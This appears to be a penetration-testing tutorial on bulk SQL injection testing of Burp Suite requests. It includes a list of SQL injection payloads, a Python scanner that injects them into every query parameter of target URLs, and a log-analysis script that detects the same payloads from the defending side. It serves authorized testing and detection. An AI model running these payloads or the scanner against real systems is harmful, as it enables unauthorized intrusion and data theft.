BULK SQL Injection Test on Burp Requests


Automate bulk SQL injection testing against multiple HTTP requests (captured via Burp) to:

  • Rapidly detect vulnerable parameters

  • Avoid manual repetition

  • Scale recon & fuzzing using Burp exports


✅ Step-by-Step Guide: Bulk SQL Injection Testing on Burp Requests


🧱 Use Case Setup

You Have:

  • A set of HTTP requests from Burp Suite:

    • Either from request history

    • Or exported .xml, .json, .txt files

  • Goal: Inject SQL payloads automatically into all parameters and check response anomalies.


🔹 Step 1: Export Requests from Burp

Option 1: Manually save selected requests

  • Right-click > Save item(s) > Choose "Individual requests" or "Burp Suite project file (.burp)"

Option 2: Copy as cURL (easier for scripting)

  • Right-click > Copy as curl

  • Paste into a .txt file or batch for automation


🔹 Step 2: Choose Your SQL Payload List

Use any of these:


' OR '1'='1
" OR "1"="1
' UNION SELECT NULL--
') OR ('a'='a

🔹 Step 3: Python Script to Automate Payload Injection

python

import requests
from urllib.parse import urlparse, parse_qs, urlencode
import time

# Load payloads (one per line, blank lines ignored)
with open("sql_payloads.txt") as f:
    payloads = [line.strip() for line in f if line.strip()]

# Load target URLs (one per line). Lines saved via "Copy as curl"
# start with "curl", so their URL must be extracted first; this
# filter keeps only lines that already start with http(s).
with open("burp_requests.txt") as f:
    urls = [line.strip() for line in f if line.startswith("http")]

# Basic scanner: substitute each payload into each query parameter in turn
for url in urls:
    parsed = urlparse(url)
    query_params = parse_qs(parsed.query)
    for param in query_params:
        original = query_params[param][0]
        for payload in payloads:
            query_params[param] = payload
            new_query = urlencode(query_params, doseq=True)
            target_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}?{new_query}"
            try:
                response = requests.get(target_url, timeout=5)
                # Crude keyword heuristic; "error" alone will produce false positives
                if "sql" in response.text.lower() or "error" in response.text.lower():
                    print(f"[!] Possible SQLi: {target_url}")
            except Exception as e:
                print(f"[!] Error on {target_url}: {e}")
            # Restore the original value before moving to the next payload/parameter
            query_params[param] = [original]
            time.sleep(1)

🔹 Step 4: (Alternative) Use Burp Extensions

📦 Extensions to try from BApp Store:

Extension        Description
Turbo Intruder   High-speed bulk fuzzing engine (best choice)
Autorize         Can be adapted for authorization + injection
Logger++         Enhanced tracking, not injection but great for diff
J2EEScan         SQLi-focused scanner for Java-based apps

✅ With Turbo Intruder, you can bulk load requests and define injection points via template + Python logic.


🔹 Step 5: Analyze Responses

Scan for:

  • HTTP 500 / 403 / 404 status anomalies

  • Keywords like sql syntax, mysql, psql, unexpected token

  • Response length changes

You can add:

python

# expected_length is the body length of the unmodified (baseline) request
if response.status_code == 500 or len(response.text) > expected_length + 50:
    print(f"[!] Response anomaly for {target_url}: status {response.status_code}, length {len(response.text)}")
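The same signals seen from the defending side, as an added example that is not part of the original post: the Step 2 payload patterns and the Step 5 status signal are matched against constructed web-server access-log lines to flag sources running bulk injection probes. The combined log format, the sample lines and the IP addresses are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse, parse_qs

# Constructed sample lines in Apache/nginx "combined" format (not real traffic).
# 203.0.113.7 sends the three Step 2 payloads against ?id=; 198.51.100.4 is benign.
SAMPLE_LOG = """\
203.0.113.7 - - [12/May/2024:10:00:01 +0000] "GET /items?id=%27+OR+%271%27%3D%271 HTTP/1.1" 500 512 "-" "python-requests/2.31"
203.0.113.7 - - [12/May/2024:10:00:02 +0000] "GET /items?id=%27+UNION+SELECT+NULL-- HTTP/1.1" 500 498 "-" "python-requests/2.31"
203.0.113.7 - - [12/May/2024:10:00:03 +0000] "GET /items?id=%27%29+OR+%28%27a%27%3D%27a HTTP/1.1" 200 2048 "-" "python-requests/2.31"
198.51.100.4 - - [12/May/2024:10:00:05 +0000] "GET /items?id=42 HTTP/1.1" 200 1840 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Signatures derived from the Step 2 payload list: quote tautology, UNION SELECT,
# and the parenthesised tautology. Matched on the URL-decoded parameter value.
SIGNATURES = [
    ("tautology", re.compile(r"""['"]\s*or\s*['"]?1['"]?\s*=\s*['"]?1""", re.I)),
    ("union_select", re.compile(r"union\s+select", re.I)),
    ("paren_tautology", re.compile(r"""['"]\)\s*or\s*\(['"]?\w+['"]?\s*=\s*['"]?\w+""", re.I)),
]

def scan_access_log(text):
    """Group suspicious requests by source IP: number of hits, parameters probed,
    signatures seen, and how many probes drew a 5xx (the Step 5 error signal)."""
    report = defaultdict(lambda: {"hits": 0, "params": set(), "signatures": set(), "server_errors": 0})
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        # parse_qs URL-decodes values, so encoded quotes and "+" are restored here
        query = parse_qs(urlparse(m["target"]).query, keep_blank_values=True)
        for name, values in query.items():
            for value in values:
                matched = [sig for sig, rx in SIGNATURES if rx.search(value)]
                if matched:
                    entry = report[m["ip"]]
                    entry["hits"] += 1
                    entry["params"].add(name)
                    entry["signatures"].update(matched)
                    if m["status"].startswith("5"):
                        entry["server_errors"] += 1
    return dict(report)

def suspicious_sources(report, min_hits=2):
    """IPs that sent at least min_hits payload-bearing requests, most active first."""
    return sorted((ip for ip, e in report.items() if e["hits"] >= min_hits),
                  key=lambda ip: -report[ip]["hits"])
```

A source whose probes draw 5xx responses deserves the first look, since that is the same anomaly the scanner in Step 5 is hunting for.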

🔐 Caution

  • Only test systems you are authorized to attack

  • Use rate-limiting and thread control if scanning large targets

  • Respect authentication/CSRF contexts if needed (pass cookies)


✅ Optional Add-ons

Want More?

  • ✅ Script to parse .burp binary files

  • ✅ GUI for loading requests and payloads

  • ✅ Auto reporting with highlights

  • ✅ Jupyter Notebook for testing & graphing response anomalies


